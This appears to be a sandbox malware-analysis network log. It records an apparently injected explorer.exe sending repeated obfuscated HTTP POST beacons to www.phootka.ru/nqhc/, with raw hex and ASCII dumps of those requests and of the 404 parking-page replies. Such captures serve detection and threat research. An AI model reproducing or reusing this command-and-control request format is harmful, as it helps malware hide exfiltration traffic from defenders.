                                                                                                                                                                                    47192.168.11.2049872195.24.68.2380C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:55.588579893 CET1276OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.phootka.ru
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.phootka.ru
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.phootka.ru/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 71 7a 73 4a 57 71 35 6b 67 56 6c 4e 30 30 74 7a 54 4a 7e 72 30 38 51 59 39 58 46 69 39 5a 33 54 5a 69 32 4f 42 71 77 42 77 57 32 67 68 45 5a 36 6e 37 31 4e 41 37 76 47 31 48 68 53 62 39 56 2d 78 51 73 74 38 41 4d 59 73 67 65 54 6b 6d 7a 53 28 35 79 34 79 63 79 6f 76 72 64 39 35 6c 6e 44 49 5a 28 51 4f 71 48 6f 37 76 37 38 53 31 67 53 46 58 62 63 56 50 74 30 47 6e 42 79 68 56 62 52 6e 53 6a 65 39 58 72 68 34 6b 73 36 50 4d 4c 35 4e 6d 4e 76 4e 4e 64 5f 5a 37 30 4c 50 49 6d 74 6a 55 4c 41 4e 45 7a 2d 44 4f 33 37 71 68 7a 34 66 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=qzsJWq5kgVlN00tzTJ~r08QY9XFi9Z3TZi2OBqwBwW2ghEZ6n71NA7vG1HhSb9V-xQst8AMYsgeTkmzS(5y4ycyovrd95lnDIZ(QOqHo7v78S1gSFXbcVPt0GnByhVbRnSje9Xrh4ks6PML5NmNvNNd_Z70LPImtjULANEz-DO37qhz4fA).
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633491993 CET1277INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:55 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Content-Length: 39481
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; }
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633565903 CET1278INData Raw: 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e
                                                                                                                                                                                    Data Ascii: output.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++];
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633621931 CET1280INData Raw: 74 61 20 2f 20 64 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: ta / damp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floo
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633675098 CET1281INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("puny
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633728027 CET1282INData Raw: 30 2c 20 6c 65 6e 20 3d 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: 0, len = output.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.enco
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633780956 CET1284INData Raw: 30 3b 20 6a 20 3c 20 69 6e 70 75 74 5f 6c 65 6e 67 74 68 3b 20 2b 2b 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a
                                                                                                                                                                                    Data Ascii: 0; j < input_length; ++j) { ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633831978 CET1285INData Raw: 6f 41 53 43 49 49 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 20 64 6f 6d 61 69 6e 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: oASCII = function ( domain ) { var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633886099 CET1286INData Raw: 65 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: een; } .logo { padding: 30px 40px; } .content { display: flex; justify-content: space-between; margin: 0 82px; } .left { display: fl
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633940935 CET1288INData Raw: 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                                                                                    Data Ascii: : 15px; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0 100 42" fill="none" xmlns="http://www.w3.org/2
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633996964 CET1289INData Raw: 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 33 2e 31 35 30 39 20 31 34 2e 31 37 38 38 43 35 33 2e
                                                                                                                                                                                    Data Ascii: 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556 12.7287 52.7556 12.47C52.455 12.211 52.0227
                                                                                                                                                                                    Nov 21, 2022 19:22:55.676619053 CET1291INData Raw: 36 34 30 35 20 31 30 2e 30 34 39 34 43 36 35 2e 39 36 37 38 20 31 30 2e 30 34 39 34 20 36 35 2e 33 35 32 31 20 31 30 2e 31 37 35 37 20 36 34 2e 37 39 32 20 31 30 2e 34 32 35 37 43 36 34 2e 32 33 31 37 20 31 30 2e 36 37 37 39 20 36 33 2e 36 31 33
                                                                                                                                                                                    Data Ascii: 6405 10.0494C65.9678 10.0494 65.3521 10.1757 64.792 10.4257C64.2317 10.6779 63.6136 11.0274 62.9346 11.475L63.2065 10.3343L58.7385 10.3351L58.2337 12.5144H59.3852L57.5098 20.6619H60.8287L62.5044 13.3418C62.9323 13.1149 63.3172 12.9453 63.6601


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    48192.168.11.2049873195.24.68.2380C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:57.655339956 CET1318OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.phootka.ru
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.phootka.ru
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.phootka.ru/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 71 7a 73 4a 57 71 35 6b 67 56 6c 4e 75 55 39 7a 55 71 57 72 34 4d 51 66 33 33 46 69 79 35 32 59 5a 69 79 4f 42 75 70 61 78 67 6d 67 68 6d 42 36 6f 61 31 4e 4a 72 76 47 39 6e 67 61 55 64 55 38 78 51 6f 4c 38 46 30 59 73 67 4b 54 6c 54 76 53 6f 35 79 37 39 38 7a 61 6e 4c 64 2d 39 6c 6e 4a 49 5a 7a 6d 4f 75 48 6f 38 65 58 38 52 33 49 53 48 31 7a 64 66 50 74 79 41 6e 42 78 6f 31 62 50 6e 53 76 57 39 57 54 78 34 33 77 36 4f 76 54 35 66 57 4e 73 48 39 63 31 52 62 31 70 49 34 37 49 6b 6e 7a 6c 56 55 76 4d 41 5f 72 73 6e 68 75 72 64 54 58 4d 79 7a 56 71 53 41 43 36 58 75 66 65 66 70 6a 72 78 31 59 53 41 73 55 56 42 4d 53 36 78 6c 79 47 75 62 76 61 52 59 33 53 34 35 66 74 44 77 64 4d 5a 32 75 53 7a 65 66 32 66 79 52 4d 57 68 50 5a 74 34 44 6f 64 4a 45 6a 50 38 6c 52 76 32 5a 41 57 33 53 36 53 6b 49 77 53 56 4c 4a 47 53 37 77 6f 65 50 4a 76 42 4d 64 77 48 46 45 67 4c 73 6c 62 67 4b 61 6a 57 7e 33 41 31 55 61 44 76 61 55 79 43 39 52 73 33 46 49 78 70 45 70 43 5a 61 6e 34 48 45 6d 66 47 75 66 54 54 78 59 35 6f 58 31 4d 30 63 43 55 47 34 66 6e 48 42 70 33 58 53 41 45 55 75 45 71 4f 56 52 59 69 46 62 49 74 4a 70 31 50 59 59 6b 35 5a 61 4b 62 57 55 43 33 73 4f 33 4e 59 56 62 65 42 73 45 6f 42 4a 51 50 35 61 58 76 7a 45 46 5f 57 46 28 38 55 31 49 35 58 47 6d 7a 51 68 63 35 66 6c 43 56 69 4d 44 55 33 4c 4a 4b 76 72 70 6e 56 33 4d 42 77 43 4a 64 71 4d 6d 55 73 34 76 41 64 51 6a 6a 44 6f 57 58 73 2d 70 77 39 6d 6b 69 33 61 49 79 55 6c 73 77 35 62 7a 41 51 4c 43 32 59 45 41 4e 53 70 58 47 59 62 72 4b 39 38 43 77 68 54 59 55 52 57 4f 38 4f 38 43 76 55 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=qzsJWq5kgVlNuU9zUqWr4MQf33Fiy52YZiyOBupaxgmghmB6oa1NJrvG9ngaUdU8xQoL8F0YsgKTlTvSo5y798zanLd-9lnJIZzmOuHo8eX8R3ISH1zdfPtyAnBxo1bPnSvW9WTx43w6OvT5fWNsH9c1Rb1pI47IknzlVUvMA_rsnhurdTXMyzVqSAC6Xufefpjrx1YSAsUVBMS6xlyGubvaRY3S45ftDwdMZ2uSzef2fyRMWhPZt4DodJEjP8lRv2ZAW3S6SkIwSVLJGS7woePJvBMdwHFEgLslbgKajW~3A1UaDvaUyC9Rs3FIxpEpCZan4HEmfGufTTxY5oX1M0cCUG4fnHBp3XSAEUuEqOVRYiFbItJp1PYYk5ZaKbWUC3sO3NYVbeBsEoBJQP5aXvzEF_WF(8U1I5XGmzQhc5flCViMDU3LJKvrpnV3MBwCJdqMmUs4vAdQjjDoWXs-pw9mki3aIyUlsw5bzAQLC2YEANSpXGYbrK98CwhTYURWO8O8CvU.
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702039003 CET1320INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:57 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Content-Length: 39481
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; }
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702164888 CET1321INData Raw: 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e
                                                                                                                                                                                    Data Ascii: output.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++];
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702222109 CET1322INData Raw: 74 61 20 2f 20 64 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: ta / damp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floo
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702275991 CET1324INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("puny
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702328920 CET1325INData Raw: 30 2c 20 6c 65 6e 20 3d 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: 0, len = output.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.enco
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702382088 CET1326INData Raw: 30 3b 20 6a 20 3c 20 69 6e 70 75 74 5f 6c 65 6e 67 74 68 3b 20 2b 2b 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a
                                                                                                                                                                                    Data Ascii: 0; j < input_length; ++j) { ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702435017 CET1328INData Raw: 6f 41 53 43 49 49 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 20 64 6f 6d 61 69 6e 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: oASCII = function ( domain ) { var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702487946 CET1329INData Raw: 65 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
